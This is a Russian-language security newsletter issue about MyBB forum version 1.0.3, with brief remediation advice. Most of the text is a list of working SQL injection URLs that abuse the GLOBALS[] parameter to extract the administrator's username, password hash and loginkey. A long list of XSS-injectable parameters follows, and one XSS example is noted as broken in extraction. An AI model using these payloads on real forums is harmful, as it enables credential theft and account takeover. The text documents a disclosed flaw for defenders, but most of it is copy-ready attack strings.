
Компьютер для продвинутых пользователей. Выпуск по безопасности. Ошибка в MyBB.


Компьютер для продвинутых пользователей
Содержание:
MyBB
ПО: MyBB
Версия: 1.0.3

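Использование:
SQL-инъекции.
Во всех приведённых ниже запросах присутствует параметр GLOBALS[]: по-видимому, он позволяет переопределить внутренние переменные скрипта (sql, comma, buddysql, ignoresql, comma2), значение которых затем подставляется в SQL-запрос без проверки. Администраторам уязвимой версии стоит обновить MyBB до версии новее 1.0.3, отклонять запросы с параметром GLOBALS на уровне веб-сервера и проверить журналы доступа на наличие GLOBALS[] и union%20select; если такие запросы найдены, следует сменить пароли и сбросить loginkey затронутых учётных записей.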

Похищение имени пользователя администратора:
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*
private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20uid,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*

Похищение пароля администратора:
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*
private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*

Похищение Loginkey:
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*
private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*

Ну, и просто работа с пользователями:
showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20mybb_users%20where%20usergroup=4/*
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*

Пароль:
showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20mybb_users%20where%20usergroup=4/*
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/*

Loginkey:
showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20mybb_users%20where%20usergroup=4/*
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/*

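XSS-инъекции:
Уязвимость проявляется на странице forumdisplay.php?fid=1: после адреса добавляется &">& (пример в исходном тексте, по-видимому, повреждён при извлечении — HTML-разметка вырезана). Причина — значение параметра выводится в страницу без HTML-экранирования.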

Также инъекции проводятся через следующие параметры:
index.php?GLOBALS[]=1&onlinemembers=
calendar.php?action=dayview&year=2006&month=2&day=1&&GLOBALS[]=1&events=
calendar.php?action=dayview&year=2006&month=2&day=1&&GLOBALS[]=1&bdaylist=
calendar.php?action=editevent&eid=1&GLOBALS[]=1&yearopts=
editpost.php?pid=1&GLOBALS[]=1&attachments=
forumdisplay.php?fid=1&GLOBALS[]=1&modlist=
forumdisplay.php?fid=1&GLOBALS[]=1&onlinemembers=
forumdisplay.php?fid=2&GLOBALS[]=1&announcements=
forumdisplay.php?fid=2&GLOBALS[]=1&threads=
memberlist.php?GLOBALS[]=1&member=
misc.php?action=help&GLOBALS[]=1&sections=
misc.php?action=whoposted&GLOBALS[]=1&whoposted=
misc.php?action=smilies&GLOBALS[]=1&smilies=
online.php?action=today&GLOBALS[]=1&todayrows=
portal.php?GLOBALS[]=1&onlinemembers=
portal.php?GLOBALS[]=1&threadlist=
portal.php?GLOBALS[]=1&announcements=
private.php?GLOBALS[]=1&messagelist=
private.php?action=tracking&GLOBALS[]=1&readmessages=
private.php?action=tracking&GLOBALS[]=1&unreadmessages=
private.php?action=folders&GLOBALS[]=1&folderlist=
private.php?action=folders&GLOBALS[]=1&newfolders=
showteam.php?GLOBALS[]=1&usergrouprows=
showteam.php?GLOBALS[]=1&usergroups=
showthread.php?tid=1&GLOBALS[]=1&posts=
showthread.php?tid=1&GLOBALS[]=1&polloptions=
stats.php?GLOBALS[]=1&mostreplies=
usercp.php?action=profile&GLOBALS[]=1&bdaydaysel=
usercp.php?action=profile&GLOBALS[]=1&returndatesel=
usercp.php?action=profile&GLOBALS[]=1&select=
usercp.php?action=profile&GLOBALS[]=1&requiredfields=
usercp.php?action=profile&GLOBALS[]=1&customfields=
usercp.php?action=options&GLOBALS[]=1&langoptions=
usercp.php?action=options&GLOBALS[]=1&tppoptions=
usercp.php?action=options&GLOBALS[]=1&pppoptions=
usercp.php?action=favorites&GLOBALS[]=1&threads=
usercp.php?action=favorites&GLOBALS[]=1&folder=">
usercp.php?action=subscriptions&GLOBALS[]=1&threads=
usercp.php?action=subscriptions&GLOBALS[]=1&folder=
usercp.php?action=subscriptions&GLOBALS[]=1&forumsubscriptions=
usercp.php?action=forumsubscriptions&GLOBALS[]=1&forumsubscriptions=
usercp.php?action=forumsubscriptions&GLOBALS[]=1&forums=
usercp.php?action=avatar&GLOBALS[]=1&galleries=
usercp.php?action=editlists&GLOBALS[]=1&buddylist=
usercp.php?action=editlists&GLOBALS[]=1&ignorelist=
usercp.php?action=editlists&GLOBALS[]=1&newlist=
usercp.php?action=drafts&GLOBALS[]=1&drafts=
usercp.php?action=usergroups&GLOBALS[]=1&groupsledlist=
usercp.php?action=usergroups&GLOBALS[]=1&joinablegrouplist=

MyBB
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
